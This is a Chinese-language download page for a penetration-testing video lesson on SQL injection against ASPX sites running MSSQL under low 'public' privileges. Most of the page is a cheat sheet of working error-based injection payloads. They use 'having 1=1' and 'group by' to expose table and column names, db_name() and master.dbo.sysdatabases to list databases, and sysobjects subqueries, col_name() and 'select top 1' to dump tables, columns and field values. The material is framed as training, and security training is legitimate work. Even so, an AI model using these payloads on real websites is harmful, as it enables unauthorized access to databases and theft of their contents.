您现在的位置:圣剑网 >> 动画教程 >> 漏洞检测 >> 实战渗透测试第四课:aspx+mssql数据库,public权限注入
实战渗透测试第四课:aspx+mssql数据库,public权限注入
软件大小:19.4 MB
更新时间:2016-10-31 02:13
授权方式:共享版
人气访问:69次
运行环境:Windows All 32/64位
软件评级:
分享好友:
实战渗透测试第四课:aspx+mssql数据库,public权限注入介绍

讲师:巅峰邪恶

动画名称:渗透测试第四课   aspx+mssql数据库 public权限注入


测试环境:Win7 系统


权限

sa权限 系统权限


db权限 数据库权限


public权限   最小的权限


低权限

having 与group by 查询暴表名与字段名


url having 1=1-- 从返回错误信息中可得到当前表名与第一个字段名


url group by 字段名 having 1=1 --


url group by 字段名,字段名 having 1=1--   直到返回正常页面为止,可得到所有字段名


暴所有数据库名


url and db_name()=0 --  


url and db_name(n)=0 --

and 1=(select name from master.dbo.sysdatabases where dbid=1) 增加dbid的值


暴当前库中所有的表


and (select top 1 name from (select top n name from sysobjects where xtype=0x75 order by 

name) t order by name desc)=0


其中 0x75 是 u 的十六进制,添加 n 数字的值,就可以爆出当前数据库的所有表明了。


如果要跨库查询其他数据库的表名,则可提交如下查询语句:

and (select top 1 name from (select top n name from  数据库名..sysobjects where xtype=0x75 

order by name) t order by name desc)=0

曾加 n 数字的值,就可以爆出指定数据库的所有表名了。


暴字段名


and (select col_name(object_id('表名'),n))=0

增加n的值,可以得到所到字段名


暴字段值


and (select top 1 字段名 from 表名)>0

实战渗透测试第四课:aspx+mssql数据库,public权限注入下载地址
网友评论

关于圣剑 - 广告服务 - 招聘信息 - 友情连接 - 保护隐私权 - 意见反馈 - 帮助中心 - 联系我们

Copyright © 2016 Sjian.Net Inc. All Rights Reserved.大千网络科技有限公司 版权所有

不良信息举报中心 陕ICP备10005927号 陕公网安备61010402000003号